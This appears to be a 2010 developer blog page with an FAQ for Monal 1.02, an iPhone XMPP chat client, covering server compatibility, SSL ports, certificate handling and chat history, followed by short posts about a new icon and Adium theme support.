    Monal 1.02 has been tested mostly with Google Talk, Openfire and ejabberd.
    Openfire has been very heavily tested on multiple versions all the way up to 3.6.4.

    ejabberd was tested on jabbim.com.

    What SSL settings work?

    At the moment only old-style SSL works. This means if you are going to use SSL it probably should be on port 5223. If you connect on 5222 with SSL it will not work.

    What server settings work?

    The server must support SASL PLAIN authentication. This is the standard and should not be a problem for most people. Connections to port 5222 should not have SSL enabled. To use SSL you need to use port 5223. Not all servers support SSL on port 5223; if your server does not, you can use 5222 without SSL if you are OK with that.

    What if the certificate on the server does not match the server address?
    Monal does not check to make sure that the certificate name and the server name are the same. SSL connections to these servers  should work fine.

    What if I have a self-signed certificate?
    Edit: the answer below applies to 1.02 only. 1.03 supports self-signed certificates.

    Monal does not support servers with self-signed certificates right now. You cannot use SSL to connect to a server with a self-signed certificate.

    Why does the program slow down when I open it the first time / connect to a server the first time?

    Monal tries to download all the buddy icons after loading the list of people online. This takes up resources and might slow things down, depending on how many buddies you have, how fast your connection is and how big your icons are.

    Why does the chat screen flash when I load a new conversation?

    Monal basically uses a web view (Safari) to show the chat window in all its glory. The flash is Safari loading the page. This only happens when you first start a chat.

    How do I delete chat history?

    Go to the chat logs and swipe to delete all history with that user, or click "Edit" on the upper right to select items and delete them. If you want to delete all logs, delete the log that is the entry for your own user. This will delete every message you have received or sent.

    Sunday, January 31, 2010

    New Icon

    With a new name, Monal also has a new icon, also designed by Ayush Pokharel.

    Saturday, January 30, 2010

    Adium themes are in

    As luck would have it, there was a critical bug in the version of Monal submitted to the App Store and I pulled it before it was approved. While it was in the approval queue I managed to get the Adium themes working correctly, so it will be in 1.02.

    Appending the following to the changelog:
    21. New faster and better looking message display that is compatible with Adium themes.